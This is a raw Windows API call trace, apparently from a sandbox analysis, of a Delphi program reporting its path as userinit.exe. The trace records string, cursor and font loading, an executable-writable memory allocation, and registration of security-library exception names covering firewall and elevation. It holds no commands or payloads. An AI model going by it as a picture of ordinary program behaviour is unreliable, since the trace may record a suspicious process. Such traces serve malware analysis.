[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff05, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff04, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff03, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff02, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff01, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff00, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff1f, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff1e, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff1d, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff1c, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff1b, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff1a, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff19, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff18, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff17, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0110.326] LoadStringA (in: hInstance=0x2830000, uID=0xff16, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0110.327] LoadStringA (in: hInstance=0x2830000, uID=0xff15, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0110.327] LoadStringA (in: hInstance=0x2830000, uID=0xff14, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0110.327] LoadStringA (in: hInstance=0x2830000, uID=0xff13, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0110.327] LoadStringA (in: hInstance=0x2830000, uID=0xff12, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0110.327] LoadStringA (in: hInstance=0x2830000, uID=0xff11, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0110.327] LoadStringA (in: hInstance=0x2830000, uID=0xff10, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0110.327] LoadStringA (in: hInstance=0x2830000, uID=0xff2f, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0110.327] LoadStringA (in: hInstance=0x2830000, uID=0xff2e, lpBuffer=0x24f1f8, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0110.327] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0110.327] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0110.327] GetVersion () returned 0x1db10106
[0110.327] GetCurrentProcessId () returned 0xf9c
[0110.327] GlobalAddAtomA (lpString="Delphi00000F9C") returned 0xc144
[0110.327] GetCurrentThreadId () returned 0xfa0
[0110.327] GlobalAddAtomA (lpString="ControlOfs0283000000000FA0") returned 0xc13d
[0110.327] RegisterClipboardFormatA (lpszFormat="ControlOfs0283000000000FA0") returned 0xc16b
[0110.327] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0110.327] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0110.327] GetSystemMetrics (nIndex=19) returned 1
[0110.327] GetSystemMetrics (nIndex=75) returned 1
[0110.327] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2951320, fWinIni=0x0 | out: pvParam=0x2951320) returned 1
[0110.327] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0110.327] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0110.327] LoadCursorA (hInstance=0x2830000, lpCursorName=0x7ff9) returned 0x301bd
[0110.328] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0110.328] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0110.328] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0110.328] LoadCursorA (hInstance=0x2830000, lpCursorName=0x7ffa) returned 0x301c1
[0110.328] LoadCursorA (hInstance=0x2830000, lpCursorName=0x7ffb) returned 0x301c3
[0110.328] LoadCursorA (hInstance=0x2830000, lpCursorName=0x7ffc) returned 0x30217
[0110.328] LoadCursorA (hInstance=0x2830000, lpCursorName=0x7ffd) returned 0x30215
[0110.329] LoadCursorA (hInstance=0x2830000, lpCursorName=0x7fff) returned 0x301f5
[0110.329] LoadCursorA (hInstance=0x2830000, lpCursorName=0x7ffe) returned 0x301f3
[0110.329] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0110.329] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0110.329] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0110.329] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0110.329] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0110.329] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0110.329] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0110.329] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0110.329] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0110.329] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0110.329] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0110.329] GetDC (hWnd=0x0) returned 0x1201087d
[0110.329] GetDeviceCaps (hdc=0x1201087d, index=90) returned 96
[0110.329] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.330] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0110.330] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2889a60, dwData=0x295156c) returned 1
[0110.330] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x24f563, fWinIni=0x0 | out: pvParam=0x24f563) returned 1
[0110.330] CreateFontIndirectA (lplf=0x24f563) returned 0x120a0887
[0110.330] GetObjectA (in: h=0x120a0887, c=60, pv=0x24f354 | out: pv=0x24f354) returned 60
[0110.330] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x24f40f, fWinIni=0x0 | out: pvParam=0x24f40f) returned 1
[0110.330] CreateFontIndirectA (lplf=0x24f4eb) returned 0xf0a0835
[0110.330] GetObjectA (in: h=0xf0a0835, c=60, pv=0x24f354 | out: pv=0x24f354) returned 60
[0110.330] CreateFontIndirectA (lplf=0x24f4af) returned 0x110a088c
[0110.330] GetObjectA (in: h=0x110a088c, c=60, pv=0x24f354 | out: pv=0x24f354) returned 60
[0110.330] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0110.331] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f4c3, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.331] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x24f4c3 | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0110.331] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x320000
[0110.331] GetKeyboardLayoutList (in: nBuff=64, lpList=0x24f444 | out: lpList=0x24f444) returned 1
[0110.332] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0110.332] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0110.333] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0110.333] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0110.333] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0110.333] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0110.333] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0110.333] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0110.333] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0110.333] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0110.334] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0110.334] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0110.334] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0110.334] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0110.334] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0110.334] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0110.334] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0110.334] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0110.334] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0110.334] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0110.334] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0110.334] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0110.335] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0110.335] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0110.335] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0110.335] LoadStringA (in: hInstance=0x2830000, uID=0xff59, lpBuffer=0x24f1a4, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0110.335] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0110.335] LoadStringA (in: hInstance=0x2830000, uID=0xff5a, lpBuffer=0x24f1a4, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0110.335] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0110.335] LoadStringA (in: hInstance=0x2830000, uID=0xff5b, lpBuffer=0x24f1a4, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0110.335] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0110.335] LoadStringA (in: hInstance=0x2830000, uID=0xff5c, lpBuffer=0x24f1a4, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0110.335] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0110.335] SetErrorMode (uMode=0x8000) returned 0x1
[0110.335] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6ceb0000
[0110.337] SetErrorMode (uMode=0x1) returned 0x8000
[0110.337] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreatePropertyFrame") returned 0x6ceb20ea
[0110.337] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreateFontIndirect") returned 0x6ceb20b7
[0110.337] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreatePictureIndirect") returned 0x6ceb20c8
[0110.337] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleLoadPicture") returned 0x6ceb20d9
[0110.337] SysReAllocStringLen (in: pbstr=0x291fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x291fa98*="EJwsclUnsupportedException") returned 1
[0110.337] SysReAllocStringLen (in: pbstr=0x291fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x291fa80*="EJwsclPIDException") returned 1
[0110.337] SysReAllocStringLen (in: pbstr=0x291fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x291fa68*="EJwsclJwShellExecuteException") returned 1
[0110.337] SysReAllocStringLen (in: pbstr=0x291fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x291fa50*="EJwsclShellExecuteException") returned 1
[0110.337] SysReAllocStringLen (in: pbstr=0x291fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x291fa38*="EJwsclElevationException") returned 1
[0110.337] SysReAllocStringLen (in: pbstr=0x291fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x291fa20*="EJwsclAbortException") returned 1
[0110.337] SysReAllocStringLen (in: pbstr=0x291fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x291fa08*="EJwsclSuRunErrorException") returned 1
[0110.337] SysReAllocStringLen (in: pbstr=0x291f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x291f9f0*="EJwsclElevateProcessException") returned 1
[0110.337] SysReAllocStringLen (in: pbstr=0x291f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x291f9d8*="EJwsclCertApiException") returned 1
[0110.337] SysReAllocStringLen (in: pbstr=0x291f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x291f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0110.337] SysReAllocStringLen (in: pbstr=0x291f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x291f9a8*="EJwsclInvalidStartupInfo") returned 1
[0110.337] SysReAllocStringLen (in: pbstr=0x291f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x291f990*="EJwsclFirewallNoExceptionsException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x291f978*="EJwsclFirewallInactiveException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x291f960*="EJwsclFirewallDelRuleException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x291f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x291f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x291f918*="EJwsclFirewallAddRuleException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x291f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x291f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x291f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x291f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x291f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x291f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x291f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x291f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x291f840*="EJwsclGetFWStateException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x291f828*="EJwsclSetFWStateException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x291f810*="EJwsclFirewallProfileInitException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x291f7f8*="EJwsclFirewallInitException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x291f7e0*="EJwsclGenericFirewallException") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x291f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x291f7b0*="EJwsclInvalidRegistryPath") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x291f798*="EJwsclEndOfStream") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x291f780*="EJwsclClassTypeMismatch") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x291f768*="EJwsclInvalidHandle") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x291f750*="EJwsclInvalidIndex") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x291f738*="EJwsclInvalidSession") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x291f720*="EJwsclMissingEvent") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x291f708*="EJwsclInvalidPointerType") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x291f6f0*="EJwsclCreateProcessFailed") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x291f6d8*="EJwsclNilPointer") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x291f6c0*="EJwsclUnimplemented") returned 1
[0110.338] SysReAllocStringLen (in: pbstr=0x291f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x291f6a8*="EJwsclInitWellKnownException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x291f690*="EJwsclKeyApiException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x291f678*="EJwsclKeyException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x291f660*="EJwsclHashApiException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x291f648*="EJwsclHashException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x291f630*="EJwsclCSPApiException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x291f618*="EJwsclCSPException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x291f600*="EJwsclTerminalSessionException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x291f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x291f5d0*="EJwsclTerminalServiceException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x291f5b8*="EJwsclTerminalServerConnectException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x291f5a0*="EJwsclTerminalServerException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x291f588*="EJwsclCryptUnsupportedException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x291f570*="EJwsclCryptApiException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x291f558*="EJwsclCryptException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x291f540*="EJwsclOSError") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x291f528*="EJwsclResourceInitFailed") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x291f510*="EJwsclResourceUnequalCount") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x291f4f8*="EJwsclResourceNotFound") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x291f4e0*="EJwsclResourceException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x291f4c8*="EJwsclFailedAddACE") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x291f4b0*="EJwsclUnsupportedACE") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x291f498*="EJwsclOpenWindowStationException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x291f480*="EJwsclWindowStationException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x291f468*="EJwsclCloseDesktopException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x291f450*="EJwsclCreateDesktopException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x291f438*="EJwsclOpenDesktopException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x291f420*="EJwsclDesktopException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x291f408*="EJwsclSACLAccessDenied") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x291f3f0*="EJwsclAccessDenied") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x291f3d8*="EJwsclLSAException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x291f3c0*="ESetOwnerException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x291f3a8*="ESetSecurityException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x291f390*="EJwsclInvalidParentDescriptor") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x291f378*="EJwsclInvalidKeyPath") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x291f360*="EJwsclInvalidGenericAccessMask") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x291f348*="EJwsclAdaptSecurityInfoException") returned 1
[0110.339] SysReAllocStringLen (in: pbstr=0x291f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x291f330*="EJwsclThreadException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x291f318*="EJwsclInvalidObjectException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x291f300*="EJwsclSecurityObjectException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x291f2e8*="EJwsclHashMismatch") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x291f2d0*="EJwsclStreamHashException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x291f2b8*="EJwsclStreamInvalidMagicException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x291f2a0*="EJwsclStreamSizeException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x291f288*="EJwsclStreamException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x291f270*="EJwsclNoSuchLogonSession") returned 1
